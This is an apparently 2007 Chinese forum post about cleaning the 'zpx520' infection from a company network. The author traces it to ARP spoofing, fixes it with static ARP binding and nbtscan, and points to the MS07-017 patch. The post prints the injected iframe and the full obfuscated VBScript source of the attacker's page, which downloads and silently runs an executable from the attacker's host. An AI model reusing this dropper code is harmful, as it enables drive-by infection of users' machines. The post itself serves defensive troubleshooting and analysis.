一直在跟ZPX520这个病毒斗争着~~~在网上找了N个方案，下面这2篇比较实用。
大家可以参考一下，希望能有所帮助
 
由于MS07-017漏洞目前被黑客在网页挂马上利用得比较频繁，强烈建议用户到windows update上打上相关补丁，补丁详情可参考http://forum.ikaka.com/topic.asp?board=28&artid=8292648或直接参考http://www.microsoft.com/technet/security/bulletin/ms07-017.mspx

为了简便，补丁可以用360卫士和QQ医生安装。
 
 
一个zpx520让我差点砸了公司所有电脑，不管公司任何一台电脑打开网页都会在网页代码顶部出现<iframe src='http:／／www.zpx520.com/0.htm' width=0 height=0></iframe>
刚开始我以为是公司所有电脑全部都中了病毒，我想这下全完了！！以我以往的经验，先在百度搜索相关"zpx520"信息，但不巧的时网上的资料很不全，跟本没找到能解决的办法，只知道大多数杀毒软件都没办法查到这个毒所在，想想自己机子上装的瑞星2007正版杀毒软件都没办法找到这个毒，真有点怀疑这些做杀毒软件的公司都是干什么用的！~垃圾！~~~~~

              发再多牢骚也是没用的，问题还是要解决，不然公司几十号电脑全都瘫痪在那里做不成做了！~~
下面是我从中分析的步骤，希望能给大家有所帮助！~~
　　zpx520病毒
　　特点：在要打开的网页上会出现句代码’<iframe src='http:／／www.zpx520.com/0.htm' width=0 height=0></iframe>‘
       既然中都中了，就看够究竟吧，打开www.zpx520.com/0.htm 查看了它的源码！
　　0.htm'页面上有两个统计，估计这人还想看看流量。。。
　　0.htm引用了三个页
　　1.htm 　URL http:／／q.zpx520.com/1.htm
　　stat.php　中国站长站统计代码　　　　　　　　　　　
        stat.php 　中国站长站统计代码
附：1.htm源码
<HTML><HEAD>
<META http-equiv=Content-Type c>
<SCRIPT language=VBScript>
husz="Sc"
nxfh="ri"
patc="pt"
dvmw="in"
jtaj="g."
nmmh="Fi"
fnjw="le"
ceyc="Sy"
xnvv="st"
pzyi="em"
wwhe="Ob"
uira="je"
slxb="ct"
aigm="Ad"
mimj="od"
ehop="b."
oicy="St"
sjqt="re"
ivvv="am"
aljj="Mi"
vecu="cr"
wcjc="os"
zbuf="of"
rvbw="t."
quda="XM"
gumc="LH"
xjqg="TT"
uadt="P"
jiqn="cl"
kzoh="si"
kcyg="d:"
rfgn="BD"
ibjm="96"
tbcl="C5"
twmd="56"
mjyz="-6"
jtbf="5A"
ewem="3-"
qaro="11"
zqfi="D0"
bofd="-9"
klxf="83"
uifp="A-"
xofy="00"
fwpx="C0"
iyoq="4F"
hvyp="C2"
jzll="9E"
akfm="36"
owzz="ob"
psob="je"
hdex="ct"
on error resume next
dl = "http:／／w.zpx520.com/0.exe"　没有工具，看不了
Set df = document.createElement(owzz+psob+hdex)
df.setAttribute "classid", jiqn+kzoh+kcyg+rfgn+ibjm+tbcl+twmd+mjyz+jtbf+ewem+qaro+zqfi+bofd+klxf+uifp+xofy+fwpx+iyoq+hvyp+jzll+akfm
str=aljj+vecu+wcjc+zbuf+rvbw+quda+gumc+xjqg+uadt
Set x = df.CreateObject(str,"")
str5=aigm+mimj+ehop+oicy+sjqt+ivvv
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="install.com"
set F = df.createobject(husz+nxfh+patc+dvmw+jtaj+nmmh+fnjw+ceyc+xnvv+pzyi+wwhe+uira+slxb,"")
set tmp = F.GetSpecialFolder(2)
fname1= F.BuildPath(tmp,fname1)
S.open
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</SCRIPT>
<SCRIPT type=text/jscript>
function install()
{document.write("");}
window.onload = install;
</SCRIPT>
<META c name=GENERATOR></HEAD>
<BODY></BODY></HTML>
他更有个大特点就是`
局域网内，大多数电脑，打开所有网站的页面都会先去访问http://www.zpx520.com/的网站。
比方要去http://www.sina.com/，输入网址后在下方的状态栏中显示去连接http://www.zpx520.com/，然后再跳转至http://www.sina.com/ ；然后弹出对话框internet explorer无法打开http://www.sina.com/    拒绝访问。但是有些网页可以正常打开,有些不行，估计根这个网页是否用了js有关吧。
我想了好多为什么曾以为是域名劫持`等等，我把我自己的机子清了一次又一次``最后还是不行`没法了`重装系统吧``装完了`还有这个病毒``我十分不爽``
最后无奈中的无奈时，在网上乱转，心情糟糕透了！~~~
              忽然发现什么"arp欺骗攻击"什么什么的。。。。
我决定看看是怎么回事。。。。又学习了相关使用方法
立刻用ARP -A查看了一下自己的`
运行---->cmd
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.99 --- 0x2
    Internet Address        Physical Address        Type
    192.168.1.1             00-16-ec-0f-a3-75       dynamic
    192.168.1.102           00-16-ec-0f-a3-75       dynamic
发现一个问题`网关的的MAC怎么跟102这个IP的一样``我立刻明白了``
我立刻 C:\Documents and Settings\Administrator>arp -a 192.168.1.1
Interface: 192.168.1.99 --- 0x2
    Internet Address        Physical Address        Type
    192.168.1.1             08-0a-11-9d-97-32       dynamic
取到了1的真实MAC，我马上给自己绑定`
C:\Documents and Settings\Administrator>arp -s 192.168.1.1 08-0a-11-9d-97-32
C:\Documents and Settings\Administrator>arp -a
Interface: 192.168.1.99 --- 0x2
    Internet Address        Physical Address        Type
    192.168.1.1             08-0a-11-9d-97-32       static
    192.168.1.102           00-16-ec-0f-a3-75       dynamic
最后再说一下`这一个破病毒`害的我多半天`几乎啥都没干``
好像只有域局网才会中这个病毒``因为他是ARP中间人的如果是域局网必须跟你的网关进行ARP绑定`不然有一台机子中了`所有机子都会中```嗯`用卡巴的最新版可以查杀了```如果你不进行ARP绑定`你查杀了` 过不料一会`又会。。。中上的``因为就算你杀了`你访问别的网站的时候``还会在网站的代码里面加上他自己的代码的``
这个网站利用的漏洞`
每次打开下载软件时,都会弹出来网页脚本出错, http://www.zpx520.com/0.htm杀毒软件只会显示有ANI毒,但是不能解决问题,现在要去下一个鼠标漏洞补丁了:
http://www.microsoft.com/downloads/info.aspx?na=90&p=&SrcDisplayLang=zh-cn&SrcCategoryId=&SrcFamilyId=74ad4188-3131-429c-8fcb-f7b3b0fd3d86&u=http%3a%2f%2fdownload.microsoft.com%2fdownload%2fa%2fb%2f8%2fab85b7d3-f580-41b6-9c86-f9bd6206a573%2fWindowsXP-KB935448-x86-CHS.exe
事情还没这么简单。。。。

然后再下载个"nbtscan" 查找真凶
用nbscan查找刚才我们arp -a得到192.168.1.1的MAC地址
看究竟是那一台电脑名，IP是多少，然后事情就好办了，知道是那台电脑后，大不了砸了它（呵呵没这么严重，重装系统，杀个毒就行了）